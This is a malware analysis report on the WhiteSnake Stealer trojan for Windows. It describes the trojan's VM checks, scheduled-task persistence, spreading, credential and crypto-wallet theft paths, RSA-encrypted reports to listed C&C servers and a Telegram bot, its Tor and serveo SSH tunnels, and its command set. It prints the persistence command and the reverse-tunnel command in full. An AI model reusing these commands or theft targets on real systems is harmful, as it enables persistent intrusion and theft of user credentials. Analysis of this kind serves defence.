Packer: .NET Reactor
SHA1 hash:
- 9b75ef8a67b412122e03a8209c5d46ea5a8cd957 (original file name: «Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe»)
Description
A trojan application also known as WhiteSnake Stealer. It is written in .NET and targets computers running Microsoft Windows operating systems. Malicious actors use it to steal account data from a variety of software and also to hijack other data. In addition, it allows other apps to be downloaded and run in an infected system.
Operating routine
Verification of execution in virtual machines
Before infecting a target system, the trojan checks the runtime environment to detect whether it was launched in a virtual machine. It does this by accessing the WMI interface. For this, the trojan uses the entity Win32_ComputerSystem entity in the \root\CIMV2 namespace. This entity contains information about the computer’s properties and the installed operating system.
In this structure, the fields Model and Manufacturer are verified to see whether the following strings are present in them:
- virtual
- vmbox
- vmware
- thinapp
- VMXh
- innotek gmbh
- tpvcgateway
- tpautoconnsvc
- vbox
- kvm
- red hat
- qemu
The above fields correspond to the following information:
- Model ― the name assigned to the computer by its manufacturer;
- Manufacturer ― the name of the computer manufacturer.
If a virtual machine is detected, the trojan stops working.
Anchoring in the system
The trojan copies itself into the %LOCALAPPDATA%/WindowsSecurity/ directory. Next, it executes a command that looks like this:
cmd.exe /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "<SAMPLE>" /sc MINUTE /tr "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>" /rl HIGHEST /f && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" && START "" "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>where SAMPLE is the name of the malware’s previously copied executable file.
This command performs a number of actions that include:
- Changing the console encoding to 65001 (Unicode).
- Verifying the availability of a local host.
- Creating a task with the following parameters:
- tn ― task name;
- tr ― path to the task;
- sc ― schedule type ― MINUTE;
- rl ― launching privileges ― HIGHEST (if the trojan is launched without administrative rights, the LIMITED value is used instead);
- f ― to create a task and disable warnings if a given task already exists.
- Deleting the current file from which the trojan was executed.
- Running the trojan from %LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>.
Distribution
Depending on the configuration, the trojan can spread in the following ways:
- by infecting local user accounts;
- by infecting removable storage devices
When infecting local user accounts, the trojan accesses the WMI interface, and in the \root\CIMV2 namespace, uses the entity Win32_UserAccount, which contains information about Windows user accounts. With the help of this structure, the trojan obtains the full list of users in the infected system. Next, the malicious program copies itself into the startup directory of every user.
When infecting removable storage devices, the trojan obtains the list of all the drives in the system. If any of the detected drives is removable, the malware copies itself to its root directory.
Collecting system information
The first network packet that the trojan sends to the C&C server after infecting the OS is a packet containing system information and the results obtained by executing tasks. The tasks that the trojan executes will be described in more detail in the corresponding section of the malware description.
Below is an example of the data sent in this packet.
| Parameter name (Key) | The contents (Value) | Data-collection method |
|---|---|---|
| Username | The Windows user name | From the UserName environment variable; spaces are replaced with the _ symbol. |
| Compname | The name of the infected computer | From the COMPUTERNAME environment variable; spaces are replaced with the _ symbol. |
| OS | The operating system version | From the OSVERSIONINFO structure. |
| Tag | res1110myformish | A constant string that represents the trojan’s build identifier. |
| IP | The IP address of the infected computer | From the response received after contact-ing the hxxp://ip-api[.]com/line?fields=query,country service. |
| Screen size | Screen resolution listed in the format <width>x<height> | * |
| CPU | Processor name | From the \root\CIMV2 namespace ― Win32_Processor entity ― Name field. |
| GPU | Video controller name | From the \root\CIMV2 namespace ― Win32_VideoController entity ― Name field. |
| RAM | The amount of RAM, GB. | From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― TotalPhysicalMemory field. |
| Disk | Disk size, GB. | From the \root\CIMV2 namespace ― Win32_LogicalDisk entity. |
| Model | The name given to the computer by its manufacturer. | From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― Model field. |
| Manufacturer | The computer manufacturer’s name | From the \root\CIMV2 namespace ― Win32_ComputerSystem entity― Manufacturer field. |
| Beacon | Proxy type | A constant string; its value is either serveo or tor. |
| Stub version | 1.6.1.3 | A constant that represents the trojan’s build version. |
| ExeeD | The path to the current executed file | * |
| Execution timestamp | Current time | * |
| Screenshot | A screenshot encoded with base64 | * |
| LoadedAssemblies | The list of loaded dll libraries for the current process | * |
| RunningProcesses | The list of running processes | * |
| InstalledApplications | The list of installed applications | From the SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Display-Name registry branch. |
*For fields where the data-collection method is not described, data is obtained by calling standard functions and algorithms for the C# language.
This packet is an XML form that looks like the following:
<Report xmlns:xsd="{http://www.w3.org/2001/XMLSchema"} xmlns:xsi="{http://www.w3.org/2001/XMLSchema-instance"}>
<files>
<file filename="" filedata="" filesize="" createdDate="" modifiedDate="" />
...
</files>
<information>
<information key=$key_name value=$value />
<information key=$key_name value=$value />
...
</information>
</Report>
where:
- $key_name and $value ― corresponding fields from the table;
- files ― contains information about crypto-wallet files, session files, logs, and passwords.
The packet to be sent is encrypted with an RSA algorithm. The public encryption key is built into the trojan as an XML form and is shown below:
<RSAKeyValue>
<Modulus> qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipjQP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOarnkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2RIZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgwY4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==
</Modulus>
<Exponent>
AQAB
</Exponent>
</RSAKeyValue>
The results from completing tasks are sent both to one of the C&C servers and to a dedicated Telegram chat.
The specifics of transferring data to the C&C server
To select a C&C server IP address, the trojan sends a packet to each address from the available list until the transmission is successful. Below is the list of addresses:
hxxp[:]//213[.]232.255.61:8080
hxxp[:]//88[.]99.71.225:8080
hxxp[:]//51[.]178.53.191:8080
hxxp[:]//78[.]46.66.9:8080
hxxp[:]//135[.]181.206.12:8080
hxxp[:]//217[.]145.238.175:80
hxxps[:]//164[.]90.185.9:443
hxxp[:]//94[.]156.6.209:80
hxxp[:]//104[.]248.253.214:80
hxxp[:]//141[.]94.175.31:8098
hxxp[:]//34[.]207.71.126:80
hxxp[:]//192[.]99.44.107:8080
hxxp[:]//107[.]161.20.142:8080
hxxp[:]//52[.]86.18.77:8080
hxxps[:]//192[.]99.196.191:443
hxxp[:]//216[.]250.190.139:80
hxxp[:]//205[.]185.123.66:8080
hxxp[:]//52[.]26.63.10:9999
hxxp[:]//24[.]199.110.250:8080
hxxp[:]//45[.]55.65.93:80
hxxp[:]//139[.]99.123.53:9191
hxxps[:]//44[.]228.161.50:443
hxxp[:]//162[.]33.178.113:80
hxxp[:]//167[.]71.106.175:80
hxxp[:]//45[.]76.190.214:1024
hxxp[:]//154[.]31.165.232:80
hxxp[:]//168[.]138.211.88:8099
hxxps[:]//52[.]193.176.117:443
hxxps[:]//52[.]196.241.27:443
hxxps[:]//54[.]249.142.23:443
hxxp[:]//121[.]63.250.132:88
The request is generated as follows:
- Transmission method: PUT.
- Route formation: <rand_str>_<username>@<compname>_report.wsr, where:
- <rand_str> ― a random string with a length of 5 symbols;
- <username> ― user name;
- <compname> ― this computer’s name.
- The transfer is carried out as a file upload.
The specifics of transferring data to a Telegram chat
The following message is formed:
#res1110myformish #Wallets #Beacon
<b>OS:</b> <i><Operating system></i>
<b>Country:</b> <i><Country></i>
<b>Username:</b> <i><Windows user account name></i>
<b>Compname:</b> <i><Computer name></i>
<b>Report size:</b> <Size of the sent XML>Mb
Telegram’s API is used to send the packet. The main URL that contains the API token:
hxxps[:]//api[.]telegram[.]org/bot660*******:AAHL********_******UfVtaKSR2*******
The following request parameters are added to this URL:
- chat_id=****91**** ― a constant from the malware’s configuration.
- text=hexlify(data) ― contains the text of the message (described above); the data is converted using the hexlify function.
- reply_markup= ― contains a json, converted with the hexlify function.
- parse_mode=HTML.
The data from the json:
{
"inline_keyboard": [
[
{
"text": "Download",
"url": ,
},
{
"text": "Open",
"url":
}
]
]
}
where:
- <c2_response> ― the C&C server’s response to the sent report;
- <url> ― the hxxp[:]//127[.]0.0.1:18772/handleOpenWSR?r=<c2_response> address.
Tasks executed when collecting information
The trojan has a built-in XML form with a list of data-collection tasks. This form consists of blocks of tasks that are structured as follows:
<command name="0">
<args>
<string>...</string>
...
</args>
</command>
where:
- name ― the type of task executed;
- args ― the list of arguments for the task.
Collected data
Collecting data using regular expressions―data is collected in the desired directory, using a regular expression.
Path to the directory Regular expressions %AppData%\Authy Desktop\Local Storage\leveldb * %AppData%\dolphin_anty db.json %USERPROFILE%\OpenVPN\config *\*.ovpn %AppData%\WinAuth *.xml %AppData%\obs-studio\basic\profiles *\service.json %AppData%\FileZilla sitemanager.xml
recentservers.xml%LocalAppData%\AzireVPN token.txt %USERPROFILE%\snowflake-ssh session-store.json %ProgramFiles(x86)%\Steam ssfn*
config\*.vdf%Appdata%\Discord\Local Storage\leveldb *.l?? %AppData%\The Bat! ACCOUNT.??? %SystemDrive% Account.rec0 %AppData%\Signal config.json
sql\db.sqlite%AppData%\Session config.json
sql\db.sqlite%AppData%\tox *.db
*.tox
*.ini
*.json
*.hstr
%AppData%\.purple accounts.xml %AppData%\ledger live app.json %AppData%\atomic\Local Storage\leveldb *.l?? %AppData%\WalletWasabi\Client\Wallets *.json %AppData%\Binance *.json %AppData%\Guarda\Local Storage\leveldb *.l?? %LocalAppData%\Coinomi\Coinomi\wallets *.wallet %AppData%\Bitcoin\wallets *\*wallet* %AppData%\Electrum\wallets * %AppData%\Electrum-LTC\wallets * %AppData%\Zcash *wallet*dat %AppData%\Exodus exodus.conf.json
exodus.wallet\*.seco%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb .l?? %AppData%\Jaxx\Local Storage\leveldb .l?? %UserProfile%\Documents\Monero\wallets *\* %AppData%\MyMonero FundsRequests*
PasswordMeta*
Wallets*%UserProfile%\Desktop *.txt
*.doc*
*.xls*
*.kbd*
*.pdf%UserProfile%\Downloads *.txt
*.doc*
*.xls*
*.kbd*
*.pdf%AppData%\Telegram Desktop\tdata *s;????????????????\*s Collecting user profiles―all data is copied from the desired directory:
Path to the directory %AppData%\Google\Chrome\Profiles %AppData%\Yandex\YandexBrowser\Profiles %AppData%\Vivaldi\Profiles %AppData%\CocCoc\Browser\Profiles %AppData%\CentBrowser\Profiles %AppData%\BraveSoftware\Brave-Browser\Profiles %AppData%\Chromium\Profiles %AppData%\Microsoft\Edge\Profiles %AppData%\Opera Software\Opera Stable %AppData%\Opera Software\Opera GX Stable %Appdata%\Discord %LocalAppdata%\Mozilla\Firefox\Profiles %LocalAppdata%\Thunderbird\Profiles Collecting data about crypto wallets. The list of crypto wallets that malicious actors are interested in:
The name of the crypto wallet The ID of the corresponding browser plugin Metamask nkbihfbeogaeaoehlefnkodbefgpgknn Ronin fnjhmkhhmkbjkkabndcnnogagogbneec BinanceChain fhbohimaelbohpjbbldcngcnapndodjp TronLink ibnejdfjmmkpcnlpebklmnkoeoihofec Phantom bfnaelmomeimhlpmgjnjophhpkkoljpa Collecting data from the Windows registry:
Registry key Collected values SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\* HostName
UserName
PasswordSOFTWARE\FTPWare\CoreFTP\Sites\* Host
Port
User
PWSOFTWARE\Windscribe\Windscribe2 userId
authHash
Keylogger registration
The initial keylogger registration is performed when the trojan starts. Its further interaction with the keylogger is carried out through commands received from the C&C server. Keystroke data is saved to the malware’s memory.
Command execution
Before the trojan begins executing commands, it installs a proxy server. The malware’s configuration has a field that is responsible for the proxy type:
- serveo ― a proxy using the SSH protocol and a Serveo service;
- tor ― a proxy using the Tor network.
The information about the type of proxy used is sent to the C&C server in the first packet with the system information and is located in the Beacon field.
A proxy server based on the Tor protocol
The trojan verifies whether the Tor application was previously downloaded. This check is performed depending on the availability of the %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe file. If the program does not exist, the trojan downloads it from the link hxxps[:]//github[.]com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip.
Next, it creates a %LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt configuration file for Tor as follows:
SOCKSPort <port> + 1
ControlPort <port> + 2
DataDirectory %LOCALAPPDATA%/9hyfy7lwm1/tor/data
HiddenServiceDir %LOCALAPPDATA%/9hyfy7lwm1/tor/host
HiddenServicePort 80 127.0.0.1:<port>
HiddenServiceVersion 3
where <port> is the port number on which the Tor application is opened.
Lastly, the trojan launches the app with the command %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe -f '%LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt.
A proxy server based on the SSH protocol and a Serveo service
The trojan verifies whether the OpenSSH instrument was downloaded earlier. This check is performed by referring to the SOFTWARE\OpenSSH Windows registry key. If such a key does not exist, the trojan downloads a ZIP archive containing the program, using the link hxxps[:]//github[.]com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip and places it into %TEMP%/ssh-000.zip.
Next, it unpacks the archive and launches OpenSSH with the following command:
ssh.exe -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:1233 serveo[.]netwhere:
- o ― options ― these are the parameters of the launch;
- R ― address ― this is the Serveo service address.
Commands executed by the trojan
After the proxy server is initialized, the trojan creates httpListner and connects to the created server. Next, it waits for commands to arrive.
Below is the list of commands available to the trojan:
| Command name | Description |
|---|---|
| PING |
The following response to the C&C server is generated: PONG >> <title> >> <keys> >> 0, where:
|
| UNINSTALL |
Removing the trojan from the infected system:
|
| REFRESH | The re-collection of system information and user data. |
| SCREENSHOT | A screenshot is taken. |
| NETDISCOVER | A separate thread is created to scan the local network. |
| DPAPI <data> | The trojan decrypts user data that was previously uploaded to the C&C server and can only be decrypted locally on the infected computer. The encrypted data is sent in the argument. |
| WEBCAM | A picture is taken with the web camera. |
| COMPRESS <file_name> | The specified file is placed into a ZIP archive. The name of target file is sent in the argument. |
| DECOMPRESS <file_name> | A file is extracted from a target ZIP archive. The name of the target archive is sent in the argument. |
| TRANSFER | Not implemented. |
| GET_FILE <file_name> | The trojan reads the contents of the target file. The name of the target file is sent in the argument. |
| LIST_FILES | The current directory is listed. |
| LIST_PROCESSES | The trojan creates a list of running processes. |
| EXPOSE <ip> <port> <http_version> |
The trojan launches an SSH session. The arguments are:
|
| PROXY_SETUP | The trojan enrolls a SOCKS5 proxy server in the infected system:
|
| KEYLOGGER START | Launches the keylogger. |
| KEYLOGGER STOP | Stops the keylogger. |
| KEYLOGGER VIEW | Receives data recorded by the keylogger. |
| LOADEXEC <url> | Downloads a file and launches it. The argument is the URL for downloading the target file. |
| LOADER <url> | Downloads a file. The argument is the URL leading to the target file. |
| cd <path> | The current directory is changed. The argument is the path to change the target directory to. |
